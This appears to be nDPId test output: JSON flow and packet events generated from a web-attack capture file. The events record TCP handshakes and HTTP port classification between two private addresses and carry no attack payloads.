-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347650289,"flow_last_seen":1499347650289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347650289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1499347650289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjtAAD4GG5WsEAABwKgKMuhGAFAFSiizAAAAAKACchDErAAAAgQFtAQCCAoBO4KIAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5716,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":2,"flow_last_seen":1499347650290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650290,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6EbKc6N+BUootKAScSD\/tgAAAgQFtAQCCAoD5VP9ATuCiAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":3,"flow_last_seen":1499347650292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347650292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjxAAD4GG5ysEAABwKgKMuhGAFAFSii0ynOjf4AQAOWevQAAAQEICgE7gokD5VP9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347651555,"flow_last_seen":1499347651555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347651555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1499347651555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NDJAAD4GkZ6sEAABwKgKMuhUAFBjE7f2AAAAAKACchDWVQAAAgQFtAQCCAoBO4PEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":2,"flow_last_seen":1499347651556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651556,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6FRdfw4zYxO396AScSASYwAAAgQFtAQCCAoD5VU6ATuDxAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":3,"flow_last_seen":1499347651561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347651561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NDNAAD4GkaWsEAABwKgKMuhUAFBjE7f3XX8ONIAQAOWxaQAAAQEICgE7g8UD5VU6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347654065,"flow_last_seen":1499347654065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347654065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1499347654065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1xAAD4GGnSsEAABwKgKMuhuAFBOzi1kAAAAAKACchBynwAAAgQFtAQCCAoBO4Y4AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":2,"flow_last_seen":1499347654065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6G55d2lhTs4tZaAScSA1EwAAAgQFtAQCCAoD5VetATuGOAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":3,"flow_last_seen":1499347654068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347654068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q11AAD4GGnusEAABwKgKMuhuAFBOzi1leXdpYoAQAOXUGQAAAQEICgE7hjkD5Vet"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347655367,"flow_last_seen":1499347655367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347655367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1499347655367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wQ9AAD4GBMGsEAABwKgKMuh8AFCmFkZxAAAAAKACchAA9gAAAgQFtAQCCAoBO4d+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":2,"flow_last_seen":1499347655367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6HyXTysMphZGcqAScSDioAAAAgQFtAQCCAoD5VjzATuHfgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":3,"flow_last_seen":1499347655371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347655371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wRBAAD4GBMisEAABwKgKMuh8AFCmFkZyl08rDYAQAOWBqAAAAQEICgE7h34D5Vjz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347656622,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347656622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83x1AAD4G5rKsEAABwKgKMuiKAFBnH1eqAAAAAKACchAtbQAAAgQFtAQCCAoBO4i3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":2,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6Ios50nrZx9Xq6AScSBZZwAAAgQFtAQCCAoD5VotATuItwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":3,"flow_last_seen":1499347656624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347656624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03x5AAD4G5rmsEAABwKgKMuiKAFBnH1erLOdJ7IAQAOX4bQAAAQEICgE7iLgD5Vot"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347659123,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347659123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x6pAAD4G\/iWsEAABwKgKMuikAFB+qkyDAAAAAKACchAefQAAAgQFtAQCCAoBO4spAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":2,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6KSKjQS\/fqpMhKAScSAvjAAAAgQFtAQCCAoD5VyeATuLKQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":3,"flow_last_seen":1499347659124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347659124,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x6tAAD4G\/iysEAABwKgKMuikAFB+qkyEio0EwIAQAOXOkwAAAQEICgE7iykD5Vye"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347660441,"flow_last_seen":1499347660441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347660441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1499347660441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJ9AAD4GfTGsEAABwKgKMuiyAFDQzcTuAAAAAKACchBSmAAAAgQFtAQCCAoBO4xxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":2,"flow_last_seen":1499347660441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6LJiYdyB0M3E76AScSCyxwAAAgQFtAQCCAoD5V3nATuMcQEDAwc="} 